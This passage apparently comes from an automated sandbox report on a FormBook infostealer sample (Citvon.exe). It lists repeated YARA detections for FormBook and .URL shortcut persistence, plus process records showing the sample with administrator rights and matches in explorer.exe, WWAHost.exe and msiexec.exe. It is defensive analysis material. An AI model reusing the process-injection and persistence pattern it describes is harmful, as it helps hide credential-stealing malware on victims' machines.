                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.794191369.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792747836.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.793593765.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.794887190.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.791822656.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.794518867.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.795084927.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792171644.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.794111065.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792024075.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.793496729.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.794375014.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.793721706.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.793652322.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792344973.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792856444.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.795208960.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.793342205.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.793928803.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792257287.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792959972.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792094708.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792418310.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.792530901.0000000003CD4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.794288612.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000014.00000003.795419491.0000000003DA4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        Reputation:low

                                                                        Analysis Process: Citvon.exe PID: 2920 Parent PID: 1320

                                                                        General

                                                                        Start time:06:31:02
                                                                        Start date:12/05/2021
                                                                        Path:C:\Users\Public\Citvon\Citvon.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\Public\Citvon\Citvon.exe
                                                                        Imagebase:0x400000
                                                                        File size:721408 bytes
                                                                        MD5 hash:4E71F90D1817F44313F4E101EF393968
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Analysis Process: explorer.exe PID: 3424 Parent PID: 2920

                                                                        General

                                                                        Start time:06:31:07
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff6fee60000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000001A.00000000.833193136.000000000A6D7000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                                        Reputation:high

                                                                        Analysis Process: Citvon.exe PID: 4044 Parent PID: 4424

                                                                        General

                                                                        Start time:06:31:11
                                                                        Start date:12/05/2021
                                                                        Path:C:\Users\Public\Citvon\Citvon.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\Public\Citvon\Citvon.exe
                                                                        Imagebase:0x400000
                                                                        File size:721408 bytes
                                                                        MD5 hash:4E71F90D1817F44313F4E101EF393968
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Analysis Process: WWAHost.exe PID: 5252 Parent PID: 3424

                                                                        General

                                                                        Start time:06:31:13
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\SysWOW64\WWAHost.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                                                        Imagebase:0x1340000
                                                                        File size:829856 bytes
                                                                        MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:moderate

                                                                        Analysis Process: autoconv.exe PID: 5488 Parent PID: 3424

                                                                        General

                                                                        Start time:06:31:32
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\SysWOW64\autoconv.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                                        Imagebase:0x1190000
                                                                        File size:851968 bytes
                                                                        MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Analysis Process: autofmt.exe PID: 5556 Parent PID: 3424

                                                                        General

                                                                        Start time:06:31:32
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\SysWOW64\autofmt.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                                        Imagebase:0x890000
                                                                        File size:831488 bytes
                                                                        MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language

                                                                        Analysis Process: msiexec.exe PID: 5560 Parent PID: 3424

                                                                        General

                                                                        Start time:06:31:33
                                                                        Start date:12/05/2021
                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                        Imagebase:0xb60000
                                                                        File size:59904 bytes
                                                                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >